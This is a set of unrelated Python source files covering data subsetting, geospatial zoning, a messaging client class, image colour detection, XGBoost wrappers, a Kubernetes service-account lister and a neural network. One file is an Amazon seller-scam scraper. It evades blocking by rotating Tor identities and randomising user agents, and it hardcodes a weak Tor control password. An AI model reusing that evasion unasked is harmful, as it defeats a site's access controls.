if reset_index:
vdata.reset_index(drop=True, inplace=True)
if verbose:
print '\n'
return meta_left, vdata
def subset_dataset(meta, data, columns):
"""
Get a subset of the given meta
"""
sdata = data[columns].copy()
smeta = start_meta(text_key=meta['lib']['default text'])
for col in columns:
smeta['columns'][col] = meta['columns'][col]
for col_mapper in meta['sets']['data file']['items']:
if col_mapper.split('@')[-1] in columns:
smeta['sets']['data file']['items'].append(col_mapper)
return smeta, sdata
|
1698204
|
import sys
import urllib3
import certifi
import re
import os
import random
import time
from json import loads
import socket
from urllib3.contrib.socks import SOCKSProxyManager
from bs4 import BeautifulSoup
from tqdm import tqdm
import asyncio
import aiohttp
import sqlite3
# setup colored output
from colorama import init
init(autoreset=True)
from colorama import Fore, Back, Style
print (Fore.YELLOW + """
888888 888 .d8888b.
"88b 888 d88P Y88b
888 888 Y88b.
888 888 888 88888b. .d88b. 888 .d88b. "Y888b. .d8888b 8888b. 88888b.d88b.
888 888 888 888 "88b d88P"88b 888 d8P Y8b "Y88b. d88P" "88b 888 "888 "88b
888 888 888 888 888 888 888 888 88888888 "888 888 .d888888 888 888 888
88P Y88b 888 888 888 Y88b 888 888 Y8b. Y88b d88P Y88b. 888 888 888 888 888
888 "Y88888 888 888 "Y88888 888 "Y8888 "Y8888P" "Y8888P "Y888888 888 888 888
.d88P 888
.d88P" Y8b d88P
888P" "Y88P"
""")
print(Fore.CYAN + 'An Amazon OSINT scraper for potential scam accounts')
print(Fore.YELLOW + 'By @jakecreps & @noneprivacy')
print(Fore.CYAN + 'Insert your keyword')
baseUrl = 'https://www.amazon.com/s/ref=nb_sb_noss?url=search-alias%3Daps&field-keywords=' + input()
print(Fore.CYAN + 'Which pages do you want to scan? (eg: 1-5)')
pages = input().split('-')
print(Fore.CYAN + 'Maximum Seller Feedback (%)')
threshold = input()
print(Fore.CYAN + 'What do you want to call the database? (if it does not exist, a new one will be created)')
dbName = input() + ".db"
print(Fore.CYAN + 'Use Tor to round-robin requests? (Y/N)')
torSupport = input()
if torSupport.lower() == "y":
torSupport = True
else:
torSupport = False
_products_id = {}
_sellers_id = {}
rmScores = {
'3': 'Fail',
'2': 'Warn',
'1': 'Pass',
'0': 'Zero'
}
roundRobin = 0
torPort = '9050' # 9150 if using Tor Browser
torControlPort = 9051 # 9151 if using Tor Browser
torControlPW = 'password' # append `tor --hash-password "password"` to torrc
# HashedControlPassword 16:<PASSWORD>
# don't do this if you don't know what you are doing
def initDB(db):
dbConnector = sqlite3.connect(db)
cursor = dbConnector.cursor()
tableProducts = """
CREATE TABLE IF NOT EXISTS
products (
id TEXT PRIMARY KEY NOT NULL,
rm_score TEXT
);
"""
cursor.execute(tableProducts)
tableSellers = """
CREATE TABLE IF NOT EXISTS
sellers (
id TEXT PRIMARY KEY NOT NULL,
name TEXT NOT NULL,
JL INTEGER,
feedback INTERGER
);
"""
cursor.execute(tableSellers)
tableDesc = """
CREATE TABLE IF NOT EXISTS
extras (
id TEXT NOT NULL,
contact INTEGER,
gmail INTEGER,
yahoo INTEGER,
paypal INTEGER,
FOREIGN KEY(id) REFERENCES sellers(id)
);
"""
cursor.execute(tableDesc)
tableWhoSellsWhat = """
CREATE TABLE IF NOT EXISTS
wsw (
product_id TEXT NOT NULL,
seller_id TEXT NOT NULL,
FOREIGN KEY(product_id) REFERENCES products(id),
FOREIGN KEY(seller_id) REFERENCES sellers(id)
);
"""
cursor.execute(tableWhoSellsWhat)
return dbConnector
dbConnector = initDB(dbName)
def insertProduct(productID, rmScore):
try:
cursor = dbConnector.cursor()
cursor.execute('INSERT INTO products VALUES(?,?)', (productID, rmScore))
dbConnector.commit()
except sqlite3.IntegrityError:
pass
def insertSeller(productID, sellerInfo):
try:
cursor = dbConnector.cursor()
cursor.execute('INSERT INTO wsw VALUES(?,?)', (productID, sellerInfo[0]))
dbConnector.commit()
except sqlite3.IntegrityError:
pass
try:
cursor.execute('INSERT INTO sellers VALUES(?,?,?,?)', sellerInfo)
dbConnector.commit()
except sqlite3.IntegrityError:
pass
def insertExtra(sellerID, extras):
_contact = ('contact' in extras)*1
_gmail = ('gmail' in extras)*1
_yahoo = ('yahoo' in extras)*1
_paypal = ('paypal' in extras)*1
_extras = (sellerID, _contact, _gmail, _yahoo, _paypal)
try:
cursor = dbConnector.cursor()
cursor.execute('INSERT INTO extras VALUES(?,?,?,?,?)', _extras)
dbConnector.commit()
except sqlite3.IntegrityError:
pass
def getInsertedSellers():
cursor = dbConnector.cursor()
cursor.execute('SELECT * FROM wsw')
allRows = cursor.fetchall()
with tqdm(total=len(allRows), desc='[<] Retrieving stored sellers') as cursorBar:
for row in allRows:
_sellers_id[row[1]] = {row[0] : True}
cursorBar.update(1)
cursorBar.close()
def newTorIdentity():
tor_c = socket.create_connection(('127.0.0.1', torControlPort))
tor_c.send('AUTHENTICATE "{}"\r\nSIGNAL NEWNYM\r\n'.format(torControlPW).encode())
response = tor_c.recv(1024)
if response == b'250 OK\r\n250 OK\r\n':
print('[+] new Tor identity')
def getRandomUA():
_httpPool = urllib3.PoolManager( 1,
cert_reqs='CERT_REQUIRED',
ca_certs=certifi.where())
url = "https://fake-useragent.herokuapp.com/browsers/0.1.8"
r = _httpPool.request('GET', url).data.decode('utf-8')
browsers = loads(r)['browsers']
return browsers
browsers = getRandomUA()
def randomUserAgent():
return random.choice(browsers[random.choice(list(browsers))])
def pageRequest(url):
global roundRobin
proxy = SOCKSProxyManager('socks5://localhost:'+str(torPort),
cert_reqs='CERT_REQUIRED',
ca_certs=certifi.where(),
headers={'user-agent': randomUserAgent(), 'Cookie': ''})
http = urllib3.PoolManager( 1,
cert_reqs='CERT_REQUIRED',
ca_certs=certifi.where(),
headers={'user-agent': randomUserAgent(), 'Cookie': ''})
if roundRobin % 2:
response = http.request('GET', url)
else:
if torSupport:
response = proxy.request('GET', url)
else:
response = http.request('GET', url)
roundRobin += 1
if not roundRobin % 60:
newTorIdentity()
return response.data
def reviewMetaScore(itemID):
url = f'https://reviewmeta.com/api/amazon/{itemID}'
response = pageRequest(url)
return response
async def asyncRequest(url):
timeout = aiohttp.ClientTimeout(total=60*3)
ua = {'user-agent': randomUserAgent(), 'Cookie': ''}
async with aiohttp.ClientSession(headers=ua) as session:
try:
async with await session.get(url, timeout=timeout) as response:
return await response.read()
except aiohttp.client_exceptions.ClientConnectorError:
print(Fore.RED + "\n[x] Error while fetching data from Amazon!")
def productIdsExtractor(soup):
global _products_id
for link in soup.find_all('a', href=re.compile('/dp/[\w]{2,20}/ref=sr_1_[\d]{1,3}')):
l = link.get('href')
_l = l.split('/')
try:
a = _products_id[_l[5]]
except KeyError:
_products_id.update({_l[5]: l})
return _products_id
def sellerListExtractor(sellerListLink, sbar):
divs = []
while True:
_htmlContent = pageRequest(sellerListLink)
_soup = BeautifulSoup(_htmlContent, 'lxml')
if _soup:
try:
_t = _soup.find('title').text
if _t == 'Sorry! Something went wrong!':
newTorIdentity()
sbar.write(sellerListLink)
sbar.write('[x] {}'.format(_t))
sbar.write('[*] waiting 10 sec...')
time.sleep(10)
else:
_divs = _soup.find_all('div', attrs = {'class': 'a-row a-spacing-mini olpOffer'})
for _d in _divs:
divs.append(_d)
sellerListLink = _soup.find('li', attrs = {'class': 'a-last'})
try:
a = sellerListLink.find('a')['href']
except Exception as e:
break
sellerListLink = site + sellerListLink.find('a')['href']
except AttributeError:
sbar.write("[x] can't find title, going to wait and retry")
sbar.write('[*] waiting 10 sec...')
time.sleep(10)
return divs
def sellerIdExtractor(link, sbar):
try:
_seller_id = link.split("seller=")[1]
return _seller_id
except:
sbar.write('[x] got a redirection to another website')
return False
def sellerFeedbackExtractor(soup):
_out_of = soup.find_all('span', attrs = {'class': 'a-color-success'})
if _out_of:
try:
_feedback = list(_out_of)[len(_out_of) - 1].text
return _feedback
except:
print(Fore.RED + "\n[x] Error while getting feedback from seller" +
", please check manually the next result")
return '-1'
def sellerDescExtractor(soup):
about = soup.find('span', id='about-seller-text')
if about:
_text = about.text
_whatToFind = ['contact', 'gmail', 'yahoo', 'paypal']
_about = ""
for w in _whatToFind:
if w in _text:
_about += w + ','
_about[:len(_about)-1]
return _about
return ''
def sellerJustLaunched(soup):
JL_bool = soup.find('span', id='feedback-no-rating')
if JL_bool:
return 'True'
return ''
async def extractSellerInfo(link, itemID, sbar):
sellerID = sellerIdExtractor(link, sbar)
if sellerID:
try:
_sID = _sellers_id[sellerID][itemID]
return {}
except KeyError:
_sellers_id[sellerID] = {itemID: True}
url = site + link
_htmlContent = pageRequest(url)
_soup = BeautifulSoup(_htmlContent, 'lxml')
JL_bool = sellerJustLaunched(_soup)
sellerFull = {
'id': sellerID,
'feedback': '',
'desc': '',
'just-launched': JL_bool
}
if not JL_bool:
sellerFull['feedback'] = sellerFeedbackExtractor(_soup)
if int(sellerFull['feedback']) > int(threshold):
return {}
sellerFull['desc'] = sellerDescExtractor(_soup)
return sellerFull
return {}
async def fetchSellersFull(itemID, sbar):
checkUrl = f"https://www.amazon.com/gp/offer-listing/{itemID}/ref=dp_olp_new_center?ie=UTF8"
rmScore = loads(reviewMetaScore(itemID))['s_overall']
while not rmScore:
sbar.write(Fore.YELLOW + '[x] item not scanned yet.\n' +
'Please open the next link in the browser, scan the product and press enter.')
sbar.write(f'https://reviewmeta.com/amazon/{itemID}')
sbar.write(Fore.YELLOW + '[!] if there aren\'t any reviews for this product, just type \"0\"')
_input = input('\n[>]')
if _input:
rmScore = '0'
else:
rmScore = loads(reviewMetaScore(itemID))['s_overall']
_rmScore = rmScores[rmScore]
insertProduct(itemID, _rmScore)
divs = sellerListExtractor(checkUrl, sbar)
for div in divs:
_name = div.find('h3', attrs = {'class': 'olpSellerName'})
name = _name.text.strip()
if name:
sellerLink = _name.find('a')['href']
sellerFull = await extractSellerInfo(sellerLink, itemID, sbar)
if sellerFull:
if not sellerFull['feedback'] == '-1':
sbar.write("<-> " + name + "\n |-> id: " + sellerFull['id']
+ "\n |-> just-launched: " + sellerFull['just-launched']
+ "\n |-> feedback: " + sellerFull['feedback']
+ "\n |-> desc: " + sellerFull['desc']
+ "\n --> Review Meta Score: " + _rmScore)
_t_JL = 0
if sellerFull['just-launched']:
_t_JL = 1
try:
_t_feedback = int(sellerFull['feedback'])
except ValueError:
_t_feedback = -2
_sellerFull = (sellerFull['id'], str(name), _t_JL, _t_feedback)
insertSeller(itemID, _sellerFull)
insertExtra(sellerFull['id'], sellerFull['desc'])
sbar.update(1)
site = "https://" + baseUrl.split('/')[2]
tasks = []
loop = asyncio.get_event_loop()
fPage = int(pages[0])
lPage = int(pages[1])
_tqdm_desc = "[<] Extracting ids from pages"
with tqdm(total=lPage, desc=_tqdm_desc) as pbar:
getInsertedSellers()
loop = asyncio.get_event_loop()
for i in range(lPage):
htmlContent = pageRequest(baseUrl)
soup = BeautifulSoup(htmlContent, 'lxml')
if soup.find('title').text == 'Robot Check':
pbar.write('[x] Captcha found, wait a while before retrying or change the IP!')
else:
nextPage = soup.find('a', attrs = {'id': 'pagnNextLink'})['href']
baseUrl = site + nextPage
if i >= fPage:
IDs = productIdsExtractor(soup)
if not len(IDs):
pbar.write("[x] Amazon is blocking your requests, please change IP")
exit()
for key in IDs:
task = asyncio.ensure_future(fetchSellersFull(key, pbar))
tasks.append(task)
pbar.update(1)
pbar.clear()
pbar.set_description("[<] Extracting sellers info")
loop.run_until_complete(asyncio.wait(tasks))
loop.close()
dbConnector.close()
|
1698250
|
import geopandas as gpd
import networkx as nx
import pandas as pd
import shapely
from shapely.ops import cascaded_union
from syspy.spatial import polygons, spatial
from syspy.syspy_utils import neighbors, pandas_utils, syscolors
from tqdm import tqdm
def compute_coverage_layer(layer, buffer, extensive_cols=[]):
"""
From a given GeoDataFrame layer and a shapely 2D geometry buffer, computes the coverage layer,
i.e. the GeoDataFrame of layer's entities included in the geometry buffer.
Inputs:
- layer: a GeoDataFrame object
- buffer: a shapely Polygon or MultiPolygon
- extensives_cols: a subset of columns whose value are extensives and have to be recomputed
for the new layer (for instance the population of the zone)
Outputs:
a GeoDataFrame with the same columns as the input layer, but different geometry and extensive_cols
"""
# Create
layer_in_buffer = layer.copy()
layer_in_buffer['geometry_intersect'] = layer_in_buffer.intersection(buffer)
# Explode the multipolygons in polygons
layer_in_buffer['geometries'] = layer_in_buffer['geometry_intersect'].apply(
lambda x: x.geoms if x.type == 'MultiPolygon' else [x]
)
layer_in_buffer_exploded = pandas_utils.df_explode(layer_in_buffer, 'geometries')
# Compute intersection area
layer_in_buffer_exploded['area_intersected'] = gpd.GeoSeries(layer_in_buffer_exploded['geometries']).area
# Drop row with null areas
layer_in_buffer_exploded.drop(
layer_in_buffer_exploded[layer_in_buffer_exploded['area_intersected'] == 0].index,
inplace=True
)
# Recompute extensive columns values
for col in extensive_cols:
layer_in_buffer_exploded[col] = layer_in_buffer_exploded.apply(
lambda x: x[col] * x['geometries'].area / x['geometry'].area, 1
)
layer_in_buffer_exploded.drop(['geometry', 'geometry_intersect', 'area_intersected'], 1, inplace=True)
layer_in_buffer_exploded.rename(columns={'geometries': 'geometry'}, inplace=True)
layer_in_buffer_exploded = gpd.GeoDataFrame(layer_in_buffer_exploded)
return layer_in_buffer_exploded
def merge_zonings(background, foreground, min_area_factor=0.01, min_area=None):
back = background.copy()
front = foreground.copy()
stencil = shapely.geometry.MultiPolygon(
list(front['geometry'])
).buffer(1e-9)
back['geometry'] = back['geometry'].apply(lambda g: g.difference(stencil))
back['geometry'] = polygons.biggest_polygons(list(back['geometry']))
back['area'] = [g.area for g in back['geometry']]
min_area = min_area if min_area else back['area'].mean() * min_area_factor
back = back.loc[back['area'] > min_area]
back['id'] = back.index
front['id'] = front.index
back['zoning'] = 'back'
front['zoning'] = 'front'
columns = ['zoning', 'id', 'geometry']
concatenated = pd.concat(
[back[columns], front[columns]]
)
df = concatenated
zones = list(df['geometry'])
clean_zones = polygons.clean_zoning(
zones,
buffer=1e-4,
fill_buffer=2e-3,
fill_gaps=False,
unite_gaps=True
)
df['geometry'] = clean_zones
return df.reset_index(drop=True)
def pool_and_geometries(pool, geometries):
done = []
while len(pool):
# start another snail
done.append(pool[0])
current = geometries[pool[0]]
pool = [p for p in pool if p not in done]
for i in range(len(pool)):
for p in pool:
if geometries[p].intersects(current):
done.append(p)
current = geometries[p]
pool = [p for p in pool if p not in done]
break
return done
def snail_number(zones, center, distance_to='zone'):
if distance_to == 'zone':
distance_series = zones['geometry'].apply(lambda g: center.distance(g))
elif distance_to == 'centroid':
distance_series = zones['geometry'].apply(lambda g: center.distance(g.centroid))
distance_series.name = 'cluster_distance'
distance_series.sort_values(inplace=True)
geometries = zones['geometry'].to_dict()
pool = list(distance_series.index)
done = pool_and_geometries(pool, geometries)
snail = pd.Series(done)
snail.index.name = 'cluster_snail'
snail.name = 'cluster'
indexed = snail.reset_index().set_index('cluster')['cluster_snail']
return indexed.loc[zones.index] # we use zones.index to sort the result
def cluster_snail_number(zones, n_clusters=20, centre=None, buffer=10):
"""
zones: GeoSeries
"""
df = pd.DataFrame(zones).reset_index().copy()
if centre is None:
union = cascaded_union(df.geometry).buffer(buffer)
centre = union.centroid
# Snail clusterize
clusters, cluster_series = spatial.zone_clusters(df, n_clusters=n_clusters)
df['cluster'] = cluster_series
snail = snail_number(clusters, centre)
clusters['snail'] = snail
df = df.merge(snail.reset_index(), on='cluster')
df.drop('cluster', 1, inplace=True)
# snail numbering within cluster
to_concat = []
for cluster in set(df['cluster_snail']):
temp_df = df.loc[df['cluster_snail'] == cluster]
temp_centre = cascaded_union(temp_df.geometry).centroid
temp_snail = snail_number(temp_df, temp_centre)
temp_df['snail'] = temp_snail
to_concat.append(temp_df)
concat = pd.concat(to_concat)
concat = concat.sort_values(['cluster_snail', 'snail']).reset_index(drop=True)
concat = concat.reset_index().rename(
columns={
'level_0': 'id',
'cluster_snail': 'cluster',
'index': 'original_index'
}
)
return concat[['cluster', 'id', 'original_index']]
def greedy_color(zoning, colors=syscolors.rainbow_shades, buffer=1e-6):
zoning = zoning.copy()
zoning['geometry'] = zoning['geometry'].apply(lambda g: g.buffer(buffer))
# TODO change the edge construction to make it independant from neighbors
n = neighbors.neighborhood_dataframe(zoning)
edges = n[['origin', 'destination']].values
g = nx.Graph()
g.add_edges_from(edges)
d = nx.coloring.greedy_color(
g,
strategy=nx.coloring.strategy_largest_first
)
color_list = list(colors)
def index_to_color(index):
return color_list[index]
return pd.Series(d).apply(index_to_color)
########################################################################
def intersection_area(geoa, geob):
if geoa.intersects(geob):
intersection = geoa.intersection(geob)
return intersection.area
else:
return 0
def intersection_area_matrix(x_geometries, y_geometries):
array = []
for g in tqdm(x_geometries, desc=str(len(y_geometries))):
array.append(
[
intersection_area(y_geometry, g)
for y_geometry in y_geometries
]
)
return array
def intersection_area_dataframe(front, back):
front.index.name = 'front_index'
back.index.name = 'back_index'
ia_matrix = intersection_area_matrix(
list(front['geometry']),
list(back['geometry'])
)
df = pd.DataFrame(ia_matrix)
df.index = front.index
df.columns = back.index
return df
def front_distribution(front_zone, intersection_dataframe):
"""
share of the front zone in intersection with every back zone
"""
df = intersection_dataframe
intersection_series = df.loc[front_zone]
area = intersection_series.sum()
return intersection_series / area
def back_distribution(front_zone, intersection_dataframe):
df = intersection_dataframe
"""
share of of every back zone in intersection with the front zone
"""
intersection_series = df.loc[front_zone]
area_series = df.sum()
return intersection_series / area_series
def share_intensive_columns(front_zone, back, intersection_dataframe, columns):
shares = front_distribution(front_zone, intersection_dataframe)
shared_series = back[columns].apply(lambda s: s * shares)
return shared_series.sum()
def share_extensive_columns(front_zone, back, intersection_dataframe, columns):
shares = back_distribution(front_zone, intersection_dataframe)
shared_series = back[columns].apply(lambda s: s * shares)
return shared_series.sum()
def concatenate_back_columns_to_front(front, back, intensive, extensive):
df = intersection_area_dataframe(front, back)
apply_series = pd.Series(front.index, index=front.index)
intensive_dataframe = apply_series.apply(
lambda z: share_extensive_columns(z, back, df, intensive)
)
extensive_dataframe = apply_series.apply(
lambda z: share_extensive_columns(z, back, df, extensive)
)
return pd.concat(
[front, intensive_dataframe, extensive_dataframe],
axis=1
)
def normalize_columns(df):
column_sums = df.sum()
normalized = df / column_sums
return normalized
def share_od_extensive_columns(
od_dataframe,
intersection_dataframe,
extensive_columns
):
normalized = normalize_columns(intersection_dataframe)
# series (front, back) -> normalized_intersection
stack = normalized.stack()
origin_stack = stack.loc[stack > 0].copy()
destination_stack = stack.loc[stack > 0].copy()
origin_stack.index.names = ['front_index_origin', 'back_index_origin']
dest_index_names = ['front_index_destination', 'back_index_destination']
destination_stack.index.names = dest_index_names
# dense matrix of OD shares (origin_share * destination_share)
share_matrix = origin_stack.apply(lambda v: v * destination_stack)
share_matrix = share_matrix.sort_index(axis=0).sort_index(axis=1)
# we stack the two columns index
share_stack = share_matrix.stack(dest_index_names)
share_stack.name = 'shares'
share_stack = share_stack.reset_index()
pool = od_dataframe.rename(
columns={
'origin': 'back_index_origin',
'destination': 'back_index_destination'
}
)
# we expen the od_dataframe by mergint it on the shares
merged = pd.merge(
pool,
share_stack,
on=['back_index_origin', 'back_index_destination']
)
print(len(merged))
# we reduce merged by grouping it by front indexes,
# multiplying each row by its' share
shared = merged.copy()
shared[extensive_columns] = shared[extensive_columns].apply(
lambda c: c * shared['shares'])
grouped = shared.groupby(
['front_index_origin', 'front_index_destination'],
)
extensive_sums = grouped[extensive_columns].sum()
extensive_sums.index.names = ['origin', 'destination']
return extensive_sums.reset_index()
|
1698261
|
from messagebird.base import Base
from messagebird.call_data import CallData
CALL_STATUS_STARTING = "starting"
CALL_STATUS_ONGOING = "ongoing"
CALL_STATUS_ENDED = "ended"
class Call(Base):
def __init__(self):
self.id = None
self._data = None
@property
def data(self):
return self._data
@data.setter
def data(self, value):
self._data = CallData().load(value[0])
def __str__(self):
return "\n".join([
'id : %s' % self.id,
'data.' + 'data.'.join(str(self._data).splitlines(True)),
])
|
1698269
|
from PIL import Image, ImageStat
import numpy as np
def is_color_image(file, thumb_size=50, MSE_cutoff=140, adjust_color_bias=True):
try:
pil_img = Image.open(file)
except:
print 'Couldn\'t open file %s'%file
return False
np_img = np.array(pil_img)
if len(np_img.shape) > 2 and np_img.shape[2] > 1:
if np.sum(np_img[:,:,1] - np_img[:,:,2]) == 0:
print 'Grayscale'
return False
else:
return False
bands = pil_img.getbands()
if bands == ('R','G','B') or bands== ('R','G','B','A'):
thumb = pil_img.resize((thumb_size,thumb_size))
SSE, bias = 0, [0,0,0]
if adjust_color_bias:
bias = ImageStat.Stat(thumb).mean[:3]
bias = [b - sum(bias)/3 for b in bias ]
for pixel in thumb.getdata():
mu = sum(pixel)/3
SSE += sum((pixel[i] - mu - bias[i])*(pixel[i] - mu - bias[i]) for i in [0,1,2])
MSE = float(SSE)/(thumb_size*thumb_size)
if MSE <= MSE_cutoff:
print "grayscale\t",
print "( MSE=",MSE,")"
return False
else:
print "Color\t\t\t",
print "( MSE=",MSE,")"
return True
elif len(bands)==1:
print "Black and white", bands
return False
else:
print "Don't know...", bands
return False
|
1698278
|
from __future__ import absolute_import
import inspect
import logging
import warnings
import threading
import lore.env
import lore.estimators
from lore.util import timed, before_after_callbacks
lore.env.require(
lore.dependencies.XGBOOST +
lore.dependencies.SKLEARN
)
import xgboost
logger = logging.getLogger(__name__)
class Base(object):
def __init__(self, **xgboost_params):
self.eval_metric = xgboost_params.pop('eval_metric', None)
self.scoring_metric = xgboost_params.pop('scoring_metric', None)
self.xgboost_lock = threading.RLock()
self.missing = None
super(Base, self).__init__(**xgboost_params)
def __getstate__(self):
state = super(Base, self).__getstate__()
state['xgboost_lock'] = None
return state
def __setstate__(self, state):
self.__dict__ = state
self.xgboost_lock = threading.RLock()
backward_compatible_defaults = {
'n_jobs': state.pop('nthread', -1),
'random_state': state.pop('seed', 0)
}
for key, default in backward_compatible_defaults.items():
if key not in self.__dict__.keys():
self.__dict__[key] = default
@before_after_callbacks
@timed(logging.INFO)
def fit(self, x, y, validation_x=None, validation_y=None, patience=0, verbose=None, **xgboost_kwargs):
eval_set = [(x, y)]
if validation_x is not None and validation_y is not None:
eval_set += [(validation_x, validation_y)]
if verbose is None:
verbose = True if lore.env.NAME == lore.env.DEVELOPMENT else False
try:
super(Base, self).fit(
X=x,
y=y,
eval_set=eval_set,
eval_metric=self.eval_metric,
verbose=verbose,
early_stopping_rounds=patience,
**xgboost_kwargs
)
except KeyboardInterrupt:
logger.warning('Caught SIGINT. Training aborted.')
evals = super(Base, self).evals_result()
if self.scoring_metric is None:
self.scoring_metric = self.eval_metric
results = {
'eval_metric': self.eval_metric,
'train': evals['validation_0'][self.eval_metric][self.best_iteration],
'best_iteration': self.best_iteration
}
if validation_x is not None:
results['validate'] = evals['validation_1'][self.eval_metric][self.best_iteration]
return results
@before_after_callbacks
@timed(logging.INFO)
def predict(self, dataframe, ntree_limit=None):
if ntree_limit is None:
ntree_limit = self.best_ntree_limit or 0
with self.xgboost_lock:
return super(Base, self).predict(dataframe, ntree_limit=ntree_limit)
@before_after_callbacks
@timed(logging.INFO)
def predict_proba(self, dataframe, ntree_limit=None):
if ntree_limit is None:
ntree_limit = self.best_ntree_limit or 0
with self.xgboost_lock:
return super(Base, self).predict_proba(dataframe, ntree_limit=ntree_limit)
@before_after_callbacks
@timed(logging.INFO)
def evaluate(self, x, y):
with self.xgboost_lock:
return float(self.get_booster().eval(xgboost.DMatrix(x, label=y)).split(':')[-1])
@before_after_callbacks
@timed(logging.INFO)
def score(self, x, y):
return self.evaluate(x, y)
class XGBoost(lore.estimators.Base):
def __init__(self, **kwargs):
frame, filename, line_number, function_name, lines, index = inspect.stack()[1]
warnings.showwarning('Please import XGBoost with "from lore.estimators.xgboost import Base"',
DeprecationWarning,
filename, line_number)
super(XGBoost, self).__init__(**kwargs)
class Regression(Base, xgboost.XGBRegressor):
def __init__(
self,
max_depth=3,
learning_rate=0.1,
n_estimators=100,
silent=True,
objective='reg:linear',
booster='gbtree',
n_jobs=-1,
gamma=0,
min_child_weight=1,
max_delta_step=0,
subsample=1,
colsample_bytree=1,
colsample_bylevel=1,
reg_alpha=0,
reg_lambda=1,
scale_pos_weight=1,
base_score=0.5,
random_state=0,
missing=None,
eval_metric='rmse',
**kwargs
):
kwargs = locals()
kwargs.pop('self')
kwargs.pop('__class__', None)
kwargs = dict(kwargs, **(kwargs.pop('kwargs', {})))
if 'random_state' not in kwargs and 'seed' in kwargs:
kwargs['random_state'] = kwargs.pop('seed')
if 'n_jobs' not in kwargs and 'nthread' in kwargs:
kwargs['n_jobs'] = kwargs.pop('nthread')
super(Regression, self).__init__(**kwargs)
class BinaryClassifier(Base, xgboost.XGBClassifier):
def __init__(
self,
max_depth=3,
learning_rate=0.1,
n_estimators=100,
silent=True,
objective='binary:logistic',
booster='gbtree',
n_jobs=-1,
gamma=0,
min_child_weight=1,
max_delta_step=0,
subsample=1,
colsample_bytree=1,
colsample_bylevel=1,
reg_alpha=0,
reg_lambda=1,
scale_pos_weight=1,
base_score=0.5,
random_state=0,
missing=None,
eval_metric='logloss',
scoring_metric='auc',
**kwargs
):
kwargs = locals()
kwargs.pop('self')
kwargs.pop('__class__', None)
kwargs = dict(kwargs, **(kwargs.pop('kwargs', {})))
if 'random_state' not in kwargs and 'seed' in kwargs:
kwargs['random_state'] = kwargs.pop('seed')
if 'n_jobs' not in kwargs and 'nthread' in kwargs:
kwargs['n_jobs'] = kwargs.pop('nthread')
super(BinaryClassifier, self).__init__(**kwargs)
@before_after_callbacks
@timed(logging.INFO)
def score(self, x, y):
import sklearn
y_pred = self.predict_proba(x)[:, 1]
return sklearn.metrics.roc_auc_score(y, y_pred)
MutliClassifier = BinaryClassifier
|
1698282
|
import time, os, json, sys
start_time = time.time()
from modules.main import ArgParse
from modules.logging import Logger
from modules import process as k8s
from modules.get_svc_acc import K8sSvcAcc
class ServiceAccount:
def __init__(self, namespace, logger):
self.namespace = namespace
self.logger = logger
if not self.namespace:
self.namespace = 'all'
self.k8s_object_list = K8sSvcAcc.get_svc_acc(self.namespace)
self.k8s_object = 'serviceaccount'
def get_namespaced_sa_list(self, v, l):
data = []
headers = ['NAMESPACE', 'SERVICE_ACCOUNT', 'SECRET']
for item in self.k8s_object_list.items:
for j in item.secrets:
data.append([item.metadata.namespace, item.metadata.name, j.name])
if v: print ("Total service accounts: {}".format(len(data)))
k8s.Output.print_table(data, headers, True, l)
return data
def call_all(v, namespace, l, logger):
call = ServiceAccount(namespace, logger)
call.get_namespaced_sa_list(v, l)
def main():
args = ArgParse.arg_parse()
# args is [u, verbose, ns, l, format, silent]
logger = Logger.get_logger(args.format, args.silent)
if args:
call_all(args.verbose, args.namespace, args.logging, logger)
k8s.Output.time_taken(start_time)
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print(k8s.Output.RED + "[ERROR] " \
+ k8s.Output.RESET + 'Interrupted from keyboard!')
try:
sys.exit(0)
except SystemExit:
os._exit(0)
|
1698294
|
import torch
# torch.manual_seed(0)
import torch.nn as nn
from modelZoo.resNet import ResNet, Bottleneck, BasicBlock
from modelZoo.DyanOF import creatRealDictionary
from utils import generateGridPoles, gridRing,fista
import numpy as np
def load_preTrained_model(pretrained, newModel):
'load pretrained resnet-X to self defined model '
'modified resnet has no last two layers, only return feature map'
pre_dict = pretrained.state_dict()
new_dict = newModel.state_dict()
pre_dict = {k: v for k, v in pre_dict.items() if k in new_dict}
new_dict.update(pre_dict)
newModel.load_state_dict(new_dict)
for param in newModel.parameters():
param.requires_grad = False
return newModel
class keyframeProposalNet(nn.Module):
def __init__(self, numFrame, Drr, Dtheta, gpu_id, backbone, config):
super(keyframeProposalNet, self).__init__()
self.num_frame = numFrame
self.gpu_id = gpu_id
self.backbone = backbone
self.config = config
if self.backbone == 'Resnet101':
self.modifiedResnet = ResNet(block=Bottleneck, layers=[3, 4, 23, 3], zero_init_residual=False,
groups=1, width_per_group=64, replace_stride_with_dilation=None,
norm_layer=None) # ResNet-101
self.Conv2d = nn.Conv2d(2048, 512, kernel_size=3, stride=1, padding=1, groups=1, bias=False, dilation=1)
self.bn1 = nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
elif self.backbone == 'Resnet50':
self.modifiedResnet = ResNet(block=Bottleneck, layers=[3, 4, 6, 3], zero_init_residual=False,
groups=1, width_per_group=64, replace_stride_with_dilation=None,
norm_layer=None) # ResNet-50
self.Conv2d = nn.Conv2d(2048, 512, kernel_size=3, stride=1, padding=1, groups=1, bias=False, dilation=1)
self.bn1 = nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
elif self.backbone == 'Resnet34':
self.modifiedResnet = ResNet(block=BasicBlock, layers=[3, 4, 6, 3], zero_init_residual=False,
groups=1, width_per_group=64, replace_stride_with_dilation=None,
norm_layer=None) # ResNet-34
# self.layer2 = nn.Conv2d(512, 256, kernel_size=3, stride=1, padding=0, groups=1, bias=False, dilation=1)
elif self.backbone == 'Resnet18':
self.modifiedResnet = ResNet(block=BasicBlock, layers=[2, 2, 2, 2], zero_init_residual=False,
groups=1, width_per_group=64, replace_stride_with_dilation=None,
norm_layer=None) # Resent-18
self.relu = nn.LeakyReLU(inplace=True)
'downsample feature map'
self.layer2 = nn.Conv2d(512, 256, kernel_size=3, stride=1, padding=0, groups=1, bias=False, dilation=1)
self.bn_l2 = nn.BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layer3 = nn.Conv2d(256, 128, kernel_size=3, stride=1, padding=0, groups=1, bias=False, dilation=1)
self.bn_l3 = nn.BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
